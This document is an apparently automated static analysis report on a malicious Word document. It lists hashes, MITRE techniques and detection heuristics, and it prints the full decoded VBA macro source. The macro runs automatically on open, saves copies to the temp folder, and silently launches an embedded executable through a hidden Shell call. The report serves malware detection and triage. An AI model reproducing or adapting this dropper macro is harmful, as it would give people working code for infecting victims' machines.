Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c32528fa0ac9d6f6…

MALICIOUS

Office (OLE)

158.0 KB Created: 2016-04-25 12:11:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: b0e10c2cfe66a20330df5546ffbb0684 SHA-1: e540458aca0b5cde7280cb59d374e70ce284aed6 SHA-256: c32528fa0ac9d6f6bdaa50dd1eb75cab228fbc21b254a153ab754e6a9470e42d
534 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1137.005 DLL Search Order Hijacking T1027 Obfuscated Files or Information T1105 Ingress Tool Transfer

The sample contains VBA macros that trigger on AutoOpen and Workbook_Open events. These macros use obfuscated strings and API calls like ShellExecute, LoadLibrary, and GetProcAddress to execute an embedded PE executable. The script also attempts to create a temporary RTF file and save it to the user's temporary directory, likely to stage the embedded executable for execution. The presence of an embedded PE executable and the use of auto-execution macros strongly indicate a malicious document designed to download and run a secondary payload.

Heuristics 17

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Macro.ObfuscatedChr-6203136-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedChr-6203136-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim wwo As Variant
wwo = Shell(fwr, 0)
End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CBHYJWQD = "12kljelhj2 jhg12j1"
Set geTure = CreateObject("W" & "" & "or" & "d." & "Applicatio" & BHJASD)
CBHYJWQD = "12kljelhj2 jhg12j1"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub AutoOpen()
    BVHJQWD = "1kjhj2bh1e 1" & ";1lk 2;l1jlk"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Sub Workbook_Open()
    GhbGGbv
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    End Function
Sub Auto_Open()
    Lashature
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TTGDFW = FygGr(3 + 90 + sts)
DBDDW = Environ(FTWF) + TTGDFW
JIEKR = "." & "tmp" & ""
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2245 bytes
SHA-256: 43a41157c7ef33d8c939d335e41625d23f2d7f2dd18993c816e1c13d8c687370
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    BVHJQWD = "1kjhj2bh1e 1" & ";1lk 2;l1jlk"
    GhbGGbv
End Sub
Sub Workbook_Open()
    GhbGGbv
End Sub
Sub GhbGGbv()
    Lashature
End Sub
Sub Lashature()
Dim bbgd As Boolean, sts As Integer, YGEW As String
NVUQW = "k1l2j3k21"
sts = -48 + 47
FTWF = "T" & "EM" & ""
FTWF = FTWF & "P"
bbgd = False
On Error Resume Next
Dim WOIEW As String
TTGDFW = FygGr(3 + 90 + sts)
DBDDW = Environ(FTWF) + TTGDFW
JIEKR = "." & "tmp" & ""
FFDRRF = "" & ".rtf"
LQWDO = DBDDW

FFFNNNF = LQWDO + "jebq" + FFDRRF
SSHHDD = DBDDW & "vjes" + FFDRRF
WOIEW = DBDDW & "" & "f4" & JIEKR

FssGeww (FFFNNNF)
FssGeww (SSHHDD)

Module1.Tyryka (2)
BHJASD = Chr(102 + 8)
CBHYJWQD = "12kljelhj2 jhg12j1"
Set geTure = CreateObject("W" & "" & "or" & "d." & "Applicatio" & BHJASD)
CBHYJWQD = "12kljelhj2 jhg12j1"
HHQJHDJSA = "l12k l12j lk312hjk312"
CBHYJWQD = "12kljelhj2 jhg12j1"
HHQJHDJSA = "l12k l12j lk312hjk312"
CBHYJWQD = "12kljelhj2 jhg12j1"
HHQJHDJSA = "l12k l12j lk312hjk312"
CBHYJWQD = "12kljelhj2 jhg12j1"
geTure.Visible = bbgd
geTure.Documents.Open (FFFNNNF)
Module1.Tyryka (2)
HYUASGD = Module1.Girow(WOIEW)
Module1.Tyryka (3)
geTure.Quit
Set geTure = Nothing
End Sub
Public Function FygGr(wbrw As Integer)
    FygGr = Chr(wbrw)
End Function
Public Function FssGeww(vnhe As String)
    ActiveDocument.SaveAs FileName:=vnhe, FileFormat:=5 + 1
End Function
Public Function Ftwfvs()
    Ftwfvs = "T" & "EM"
End Function
Sub Auto_Open()
    Lashature
End Sub






Attribute VB_Name = "Module1"
Sub Tyryka(Krnw As Long)
hue = 98
Dim Dfbrw As Long, Erge As Long
Erge = Krnw + Timer
Dfbrw = Erge
Do While Timer < Dfbrw
vhue = 64 * 3 * 4 * 1 * 1 * 3 * 1
Loop
bfhre = 93 + 1
THGQWD = "'1p2[ 1';l12"
QETWDA = "'1[p ]12 1p[ o21ke"
SUHIDQD = "[a psd-12"
End Sub
Public Function Girow(fwr As String)
Dim wwo As Variant
wwo = Shell(fwr, 0)
End Function
embedded_office_0000624c.exe embedded-pe Office MZ+PE at offset 0x624C 136628 bytes
SHA-256: d1260afea2a1ad02e7188848ef92e0426cf97777d73f958144bb45985e870577
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1523289018/Ole10Native 112838 bytes
SHA-256: 63bc1e0969e1ac4cbc020ff7acdaceba1f90c5c811799c3839c90c0e1d765a1b

Open this report in the interactive analyzer, or submit your own file for analysis.